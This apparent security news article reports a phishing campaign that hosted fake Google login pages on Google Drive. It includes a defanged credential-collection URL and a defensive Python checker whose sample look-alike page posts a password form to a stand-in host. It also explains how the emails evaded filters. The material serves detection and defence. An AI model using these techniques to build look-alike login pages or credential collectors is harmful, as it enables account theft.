Once again, phishers exploited Google’s reputation, running a phishing campaign aimed at stealing users’ Google credentials and gaining access to the multitude of services offered by the company.
The new phishing campaign was discovered by the security researcher Aditya K. Sood from Elastica Cloud Threat Labs. In this case too, the phishers used phishing pages hosted on Google Drive that look like a Google log-in page and were served over HTTPS. The use of HTTPS makes the web pages more realistic and less suspicious to victims.
This campaign has many similarities with a campaign discovered by experts at Symantec in March 2014: the malicious emails sent by the scammers carry the same subject, “Document,” and the stolen credentials are hosted on a third-party server.
“Elastica Cloud Threat Labs recently discovered a new Google Drive phishing campaign in which an attacker deployed phishing web pages on Google Drive. This is not the first time Google Drive has been used for phishing purposes. Last year, the security community encountered a similar type of Google Drive phishing attack.” states the blog post published by Elastica Cloud Threat Labs.
The destination URL where the victim’s credentials are sent is hxxp://alarabia[.]my/images/Fresh/performact[.]php.
The phishers were mainly interested in siphoning the Google credentials of their victims, as explained in the post.
“In an effort to maximize benefits, attackers targeted Google users specifically so as to gain access to the multitude of services associated with those accounts, since Google uses Single Sign On (SSO) procedures,” continues the post.
The experts noticed that phishing emails are able to avoid Google’s built-in detection capabilities, likely because they’re sent from a Gmail account and the embedded link points to a legitimate googledrive.com domain.
“When you open ‘drive.google.com,’ Google redirects the browser to ‘accounts.google.com’ which carries the message, ‘One Account. All of Google,’ whereas this web page highlights the message ‘Google Drive. One Storage,’ which is not legitimate,” said Aditya K. Sood from Elastica Cloud Threat Labs. “However, users targeted in this campaign might not notice this.”
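A defender-side check for the pattern described above, as an added example that is not from the Elastica post or this article: it flags a password form that is served from a host other than accounts.google.com, that posts to a different host than the page, or that posts over plain HTTP. The sample pages, the folder path and the collector.example.invalid host are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Host the article names as the legitimate Google sign-in redirect target.
GOOGLE_LOGIN_HOST = "accounts.google.com"

class LoginFormParser(HTMLParser):
    """Collect every <form> with its action and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "password": False})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1]["password"] = True

def audit_login_page(page_url, html):
    """Return (code, detail) findings for each credential form on the page."""
    parser = LoginFormParser()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        if not form["password"]:
            continue  # only forms that collect a password matter here
        target = urlparse(urljoin(page_url, form["action"]))  # resolve relative actions
        if page_host != GOOGLE_LOGIN_HOST:
            findings.append(("not_google_login_host", page_host))
        if target.hostname != page_host:
            findings.append(("off_site_post", target.hostname))
        if target.scheme != "https":
            findings.append(("plain_http_post", target.geturl()))
    return findings

# Constructed samples: a look-alike page on googledrive.com and a same-origin form.
PHISH_URL = "https://googledrive.com/host/EXAMPLE_FOLDER_ID/index.html"
PHISH_HTML = """<h1>Google Drive. One Storage</h1>
<form method="post" action="http://collector.example.invalid/post.php">
<input type="email" name="Email"><input type="password" name="Passwd"></form>"""
LEGIT_URL = "https://accounts.google.com/login"
LEGIT_HTML = """<h1>One Account. All of Google</h1>
<form method="post" action="/submit">
<input type="email" name="Email"><input type="password" name="Passwd"></form>"""

if __name__ == "__main__":
    for url, page in ((PHISH_URL, PHISH_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(url, audit_login_page(url, page))
```

The same function can be run over pages fetched by a mail gateway or URL sandbox, where the HTTPS padlock on the hosting domain says nothing about where the form submits.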
(Security Affairs – Google Drive, phishing)